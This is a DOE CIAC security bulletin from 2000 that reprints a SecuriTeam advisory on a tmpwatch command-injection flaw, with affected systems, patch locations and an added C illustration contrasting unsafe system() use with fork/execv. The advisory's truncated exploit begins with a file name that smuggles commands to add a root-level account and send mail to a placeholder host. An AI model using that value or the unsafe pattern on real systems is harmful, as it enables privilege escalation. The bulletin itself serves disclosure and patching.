__________________________________________________________

                  The U.S. Department of Energy
             Computer Incident Advisory Capability
__________________________________________________________

                      INFORMATION BULLETIN

                  Linux 'tmpwatch' Vulnerability

October 16, 2000 16:00 GMT                                      Number L-005
______________________________________________________________________________
PROBLEM:       The tmpwatch utility has a flaw in the way it uses the
               system() library subroutine.
PLATFORM:      Red Hat Linux 7.0 (tmpwatch v2.5.1)
               Red Hat Linux 6.2 (tmpwatch v2.2)
               Conectiva 4.0, 4.0es, 4.1, 4.2, 5.0, prg gráficos,
               ecommerce, 5.1
               Trustix Secure Linux
               Mandrake 6.0, 6.1, 7.0, 7.1
               Immunix OS 6.2
DAMAGE:        By getting arbitrary commands passed to the system() library
               subroutine, a local user account could gain root. By creating
               layers of subdirectories in a subdirectory monitored by
               tmpwatch, a local user could fill the system process table.
               This would cause a denial of service to the system requiring
               a hard reboot.
SOLUTION:      Apply the patches specified in the advisory.
______________________________________________________________________________
VULNERABILITY  The risk is MEDIUM. The advisory has been publicly discussed,
ASSESSMENT:    with exploit code given.
______________________________________________________________________________

[****** Begin SecuriTeam Advisory ******]

Insecure call of external programs in tmpwatch
------------------------------------------------------------------------

SUMMARY

The tmpwatch utility is used in Red Hat Linux to remove temporary files. This
utility has an option to call the "fuser" program, which verifies whether a
file is currently opened by a process. The fuser program is invoked within
tmpwatch by calling the system() library subroutine. Insecure handling of the
arguments to this subroutine could potentially allow an attacker to execute
arbitrary commands.
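The system() misuse the summary describes, as an added illustration that is not code from tmpwatch or from the advisory: the string-building call that hands a file name to a shell, beside a fork/execv replacement that passes the name as a single argv element so no shell ever parses it. The "/sbin/fuser -s" command line, the function names and the sample file names are assumptions.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Detection aid only: returns 1 if the name contains characters that /bin/sh
 * would interpret when the name is pasted into a command line. */
int has_shell_metachars(const char *name)
{
    return strpbrk(name, ";|&$`<>()*?[]{}\\\"'\n \t") != NULL;
}

/* The bug class in the advisory: the file name is formatted into a command
 * string and handed to system(), which runs it through /bin/sh.  A name such
 * as "x;id" therefore runs "id" as a second command.  Kept as the "before"
 * picture; nothing in this file calls it.  (fuser flags are assumed.) */
int check_open_via_system(const char *path)
{
    char cmd[4096];
    snprintf(cmd, sizeof cmd, "/sbin/fuser -s %s", path);
    return system(cmd);
}

/* Hardened form: fork() + execv() with the path as ONE argv element.  No shell
 * parses a command line, so metacharacters in the name are just bytes inside
 * one argument.  Returns the child's exit status, or -1 on fork/wait/exec
 * failure.  Call as run_no_shell("/sbin/fuser", path) in the tmpwatch case. */
int run_no_shell(const char *prog, const char *path)
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = { (char *)prog, "-s", (char *)path, NULL };
        execv(prog, argv);
        _exit(127);                               /* exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    if (!WIFEXITED(status) || WEXITSTATUS(status) == 127)
        return -1;
    return WEXITSTATUS(status);
}
```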
DETAILS

Affected Versions:
Red Hat Linux 7.0 (tmpwatch v2.5.1)
Red Hat Linux 6.2 (tmpwatch v2.2)
Conectiva 4.0, 4.0es, 4.1, 4.2, 5.0, prg gráficos, ecommerce, 5.1
Trustix Secure Linux
Mandrake 6.0, 6.1, 7.0, 7.1
Immunix OS 6.2

Immune Versions:
SuSE

Impact:
This vulnerability may allow local attackers to compromise superuser access
if the administrator uses tmpwatch in a non-default manner.

The tmpwatch tool removes files that have not been modified or accessed
within a specified amount of time. It was designed to remove files securely
by avoiding typical race-condition vulnerabilities. System administrators
usually run this tool periodically to remove old temporary files in
world-writable directories.

The tmpwatch tool uses the --fuser or -s option to avoid removing a file
that is held open by another process. This option uses the system() library
subroutine to call the external program /sbin/fuser with the file name being
examined as an argument. The system() subroutine spawns a shell to execute
the command. An attacker may create a file name containing shell
metacharacters, which could allow them to execute arbitrary commands if
tmpwatch with the fuser option is used to remove the file.

Source code comparison between the Red Hat Linux 6.2 and 7.0 tmpwatch
packages suggests this vulnerability was recognized and a fix was attempted.
However, the fix is incorrect, and the vulnerability is still exploitable.

Exploit:

1. Compile and run:

   #include <stdio.h>
   int main() {
       FILE *f;
       char filename[100] = ";useradd -u 0 -g 0 haks0r;mail haks0r@somehost.com

   [The rest of the exploit listing and the start of the SOLUTION section are
   missing from this copy of the advisory.]

Red Hat Linux 6.2:
Alpha:   ftp://updates.redhat.com/6.2/alpha/tmpwatch-2.6.2-1.6.2.alpha.rpm
Sparc:   ftp://updates.redhat.com/6.2/sparc/tmpwatch-2.6.2-1.6.2.sparc.rpm
i386:    ftp://updates.redhat.com/6.2/i386/tmpwatch-2.6.2-1.6.2.i386.rpm
Sources: ftp://updates.redhat.com/6.2/SRPMS/tmpwatch-2.6.2-1.6.2.src.rpm

Red Hat Linux 7.0:
i386:    ftp://updates.redhat.com/7.0/i386/tmpwatch-2.6.2-1.7.i386.rpm
Sources: ftp://updates.redhat.com/7.0/SRPMS/tmpwatch-2.6.2-1.7.src.rpm

Conectiva:
ftp://atualizacoes.conectiva.com.br/4.0/i386/tmpwatch-2.6.2-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0/SRPMS/tmpwatch-2.6.2-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/tmpwatch-2.6.2-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/SRPMS/tmpwatch-2.6.2-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/tmpwatch-2.6.2-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/SRPMS/tmpwatch-2.6.2-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/tmpwatch-2.6.2-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/SRPMS/tmpwatch-2.6.2-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/tmpwatch-2.6.2-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/SRPMS/tmpwatch-2.6.2-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/tmpwatch-2.6.2-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/SRPMS/tmpwatch-2.6.2-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/tmpwatch-2.6.2-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/SRPMS/tmpwatch-2.6.2-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/tmpwatch-2.6.2-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/SRPMS/tmpwatch-2.6.2-1cl.src.rpm

Trustix Secure Linux:
This file can be found at:
http://www.trustix.net/download/Trustix/updates/1.1/RPMS/
Or
ftp://ftp.trustix.com/pub/Trustix/updates/1.1/RPMS/

Mandrake:
You can download the updates directly from:
ftp://ftp.linux.tucows.com/pub/distributions/Mandrake/Mandrake/updates
ftp://ftp.free.fr/pub/Distributions_Linux/Mandrake/updates

Linux-Mandrake 6.0:
6.0/RPMS/tmpwatch-2.6.2-1mdk.i586.rpm
6.0/SRPMS/tmpwatch-2.6.2-1mdk.src.rpm
Linux-Mandrake 6.1:
6.1/RPMS/tmpwatch-2.6.2-1mdk.i586.rpm
6.1/SRPMS/tmpwatch-2.6.2-1mdk.src.rpm
Linux-Mandrake 7.0:
7.0/RPMS/tmpwatch-2.6.2-1mdk.i586.rpm
7.0/SRPMS/tmpwatch-2.6.2-1mdk.src.rpm
Linux-Mandrake 7.1:
7.1/RPMS/tmpwatch-2.6.2-1mdk.i586.rpm
7.1/SRPMS/tmpwatch-2.6.2-1mdk.src.rpm

Immunix OS 6.2:
http://www.immunix.org:8080/ImmunixOS/6.2/updates/RPMS/tmpwatch-2.6.2-1.6.2_StackGuard.i386.rpm
Or
http://www.immunix.org:8080/ImmunixOS/6.2/updates/SRPMS/tmpwatch-2.6.2-1.6.2_StackGuard.src.rpm

ADDITIONAL INFORMATION

The information has been provided by X-Force, Alexander Y. Yurchenko, TSL
Team, Roman Drahtmueller, Linux Mandrake Security Team, and Greg KH.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body
to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to:
list-subscribe@securiteam.com

========================================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind. In no event shall we be liable for any damages whatsoever including
direct, indirect, incidental, consequential, loss of business profits or
special damages.

[****** End SecuriTeam Advisory ******]
_______________________________________________________________________________

CIAC wishes to acknowledge the contributions of Beyond-Security's SecuriTeam
for the information contained in this bulletin.
_______________________________________________________________________________

CIAC, the Computer Incident Advisory Capability, is the computer security
incident response team for the U.S. Department of Energy (DOE) and the
emergency backup response team for the National Institutes of Health (NIH).
CIAC is located at the Lawrence Livermore National Laboratory in Livermore,
California. CIAC is also a founding member of FIRST, the Forum of Incident
Response and Security Teams, a global organization established to foster
cooperation and coordination among computer security teams worldwide.

CIAC services are available to DOE, DOE contractors, and the NIH. CIAC can be
contacted at:
    Voice:    +1 925-422-8193
    FAX:      +1 925-423-8002
    STU-III:  +1 925-423-2604
    E-mail:   ciac@llnl.gov

For emergencies and off-hour assistance, DOE, DOE contractor sites, and the
NIH may contact CIAC 24-hours a day. During off hours (5PM - 8AM PST), use one
of the following methods to contact CIAC:

    1. Call the CIAC voice number 925-422-8193 and leave a message, or
    2. Call 888-449-8369 to send a Sky Page to the CIAC duty person or
    3. Send e-mail to 4498369@skytel.com, or
    4. Call 800-201-9288 for the CIAC Project Leader.

Previous CIAC notices, anti-virus software, and other information are
available from the CIAC Computer Security Archive.

    World Wide Web:  http://www.ciac.org/
                     (or http://ciac.llnl.gov -- they're the same machine)
    Anonymous FTP:   ftp.ciac.org
                     (or ciac.llnl.gov -- they're the same machine)
    Modem access:    +1 (925) 423-4753 (28.8K baud)
                     +1 (925) 423-3331 (28.8K baud)

PLEASE NOTE: Many users outside of the DOE, ESnet, and NIH computing
communities receive CIAC bulletins. If you are not part of these
communities, please contact your agency's response team to report incidents.
Your agency's team will coordinate with CIAC. The Forum of Incident Response
and Security Teams (FIRST) is a world-wide organization. A list of FIRST
member organizations and their constituencies can be obtained via WWW at
http://www.first.org/.

This document was prepared as an account of work sponsored by an agency of
the United States Government.
Neither the United States Government nor the University of California nor any
of their employees, makes any warranty, express or implied, or assumes any
legal liability or responsibility for the accuracy, completeness, or
usefulness of any information, apparatus, product, or process disclosed, or
represents that its use would not infringe privately owned rights. Reference
herein to any specific commercial products, process, or service by trade name,
trademark, manufacturer, or otherwise, does not necessarily constitute or
imply its endorsement, recommendation or favoring by the United States
Government or the University of California. The views and opinions of authors
expressed herein do not necessarily state or reflect those of the United
States Government or the University of California, and shall not be used for
advertising or product endorsement purposes.

LAST 10 CIAC BULLETINS ISSUED (Previous bulletins available from CIAC)

K-068: Automated Web Interface Scans IIS for Multiple Vulnerabilities
K-069: Input Validation Problem in rpc.statd
K-070: PGP Additional Decryption Keys ADKs Vulnerability
K-071: cisco.ciscosecure.acs.vulnerability.txt
K-072: trinity.stacheldraht.variants.txt*
K-073: vulnerabilities.firewall.1.txt*
L-001: Linux/BSD initialized data overflow in Xlock
L-002: Cisco Secure PIX Firewall Mailguard Vulnerability
L-003: FreeBSD TCP Sequence Number Vulnerability
L-004: FreeBSD LPRng Vulnerability